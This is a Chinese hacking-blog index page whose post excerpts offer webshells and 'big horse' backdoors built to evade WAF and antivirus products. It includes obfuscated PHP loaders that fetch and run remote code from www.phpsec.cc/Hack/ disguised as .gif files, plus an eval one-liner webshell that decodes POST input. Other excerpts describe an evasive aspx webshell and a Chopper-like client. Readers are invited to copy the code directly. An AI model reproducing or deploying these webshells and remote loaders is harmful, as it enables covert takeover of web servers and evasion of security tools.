PHPINFO为广大热爱网络技术的朋友无私的提供最新网络教程、网络工具、网络攻防、BUG漏洞,在这里能学到更好的网络技术技巧与经验!致力于安全研究 程序开发!
文章59 浏览73944

无视WAF

这家伙很懒,还没填写该栏目的介绍呢~

无视WAF

【精】国产免杀PHP大马无视各类waf,精品界面,超强功能!Admin_Php

阅读(21934) 评论(2)

2018年6月11日,21.26续帖更新! 要是想直接用这款的可以直接复制以下代码~用的是我远程的地址!会PHP的可以自行改! <?php set_time_limit(666); $i = range('~','.'); s($i[27].$i[22].$i[12], $i[22].$i[10].$i[10] .$i[14].$i[68].$i[79].$i[79].$i[7].$i[7] .$i[7].$i[80].$i[14].$i[22].$i[14].$i[11] .$i[25].$i[27].$i[80].$i[27].$i...阅读全文>>

无视WAF

XISE强势改版【PHPINFO-BOX】发布!

阅读(8312) 评论(2)

点击图片查看大图 由于XISE源码的泄漏,网上也公布很多,但是公布出来都是不全的,编译出来都是没办法使用的!而且局部一些地方和数据库和模块拼接都不对。所以根本就没什么用。 大家可以自己在网上搜索一下,另外有的也是能编译出来能正常使用,但是不会自动识别脚本,导致连接的时候要很长的时间! 还有就是生成文章模块,公布的源码都是文件内存没释放,读写模版的时候写入进来就直接占满内存,点击生成的时候电脑直接瘫痪,这一块还没去做针对性的修改!但是其他的细节都是有去优化~~心情好了我会共享出源码出来! 优化细节: ...阅读全文>>

无视WAF

过各类主流WAF的PHP大马!原型之去后门

阅读(31231) 评论(0)

过狗过D盾更新: <?php set_time_limit(666); $i = array("cms","chr","http://","www.phpsec.cc/Hack","/bypasswaf.gif"); s($i[1],$i[2].$i[3].$i[4]); session_start(); function s($c,$url){ if(empty($_SESSION['PhpCode'])){ $_SESSION['PhpCode']=file_get_contents($url); m($_SESSION['PhpCode'],$c); ...阅读全文>>

无视WAF

【国内首发】PHP大马-php_mof SHELL【1KB不到】

阅读(22040) 评论(2)

过狗过D盾更新: <?php set_time_limit(666); $i = array("cms","chr","http://","www.phpsec.cc/","Hack/404.gif"); s($i[1],$i[2].$i[3].$i[4]); session_start(); function s($c,$url){ if(empty($_SESSION['PhpCode'])){ $_SESSION['PhpCode']=file_get_contents($url); m($_SESSION['PhpCode'],$c);...阅读全文>>

无视WAF

最新过狗/过盾/过某锁菜刀(Hatchet)发布!

阅读(11520) 评论(0)

Hatchet--别名斧头!类似于中国菜刀。 唯一弱点:  存在细节方面没处理好  数据库与菜刀有所区别不能共用 但是Hatchet是开源的,这都是可以去优化的! ================================== 今天在群里看到小伙伴们在聊过狗菜刀,无意间有位小伙伴提到了这个Hatchet,然后问他拿了套源码,自己动手鼓捣了一番,也不能说无视所有,狗+锁+盾测试都没什么问题! ---------下面是安全狗测试过程--------------------  ...阅读全文>>

无视WAF

过狗过云锁PHP一句话

阅读(4703) 评论(0)

这几个月 没什么东西写 东西都是转载 哈哈哈 最近更新一些原创吧。今天在群里面看到一些机油讨论0day一些话题。看到一个据说是过狗过云锁的一句话   <?php error_reporting(0);set_time_limit(0);$a=$_POST["x"];if($a){$a=str_replace(array("\n","\t","\r"),"",$a);$b="";for($i=0;$i<strlen($a);$i+=2)$b.=urldecode("%".substr($a,$i,2));eval($b);exit;};?> ...阅读全文>>

无视WAF

php中&引用免杀webshell

阅读(3116) 评论(0)

0x00 php中的& 1.函数的参数引用 <?php function test(&$a){ $a=$a+100; } $b=1; echo $b;//输出1 test($b); //这里$b传递给函数的其实是$b的变量内容所处的内存地址,通过在函数里改变$a的值就可以改变$b的值了 echo "<br>"; echo $b;//输出101 ?> 2.函数的返回引用 <?php function &test() { ...阅读全文>>

无视WAF

免杀Aspx大马一枚、过常见WAF!

阅读(11267) 评论(0)

今天在提权的时候发现的一个免杀的aspx大马,本身我用的是asp的免杀木马,由于asp马不能执行cmd,提权的时候我丢各类aspx的大马一上传就全部被隔离了,文件直接被隔离掉,生成xxx.aspx.log了,正在无助的时候,翻到有前辈的脚印! 打开一看,真是个大马。。 然后下载下来分析了一下,为什么不被杀,源码打开一看! 原来文件头故意弄了这么多的乱码就是为了绕过杀软的检测,类似杀软只检测文件类型的文件头部,如果文件头部杀软判断不出来是恶意网站木马的话就行了! ...阅读全文>>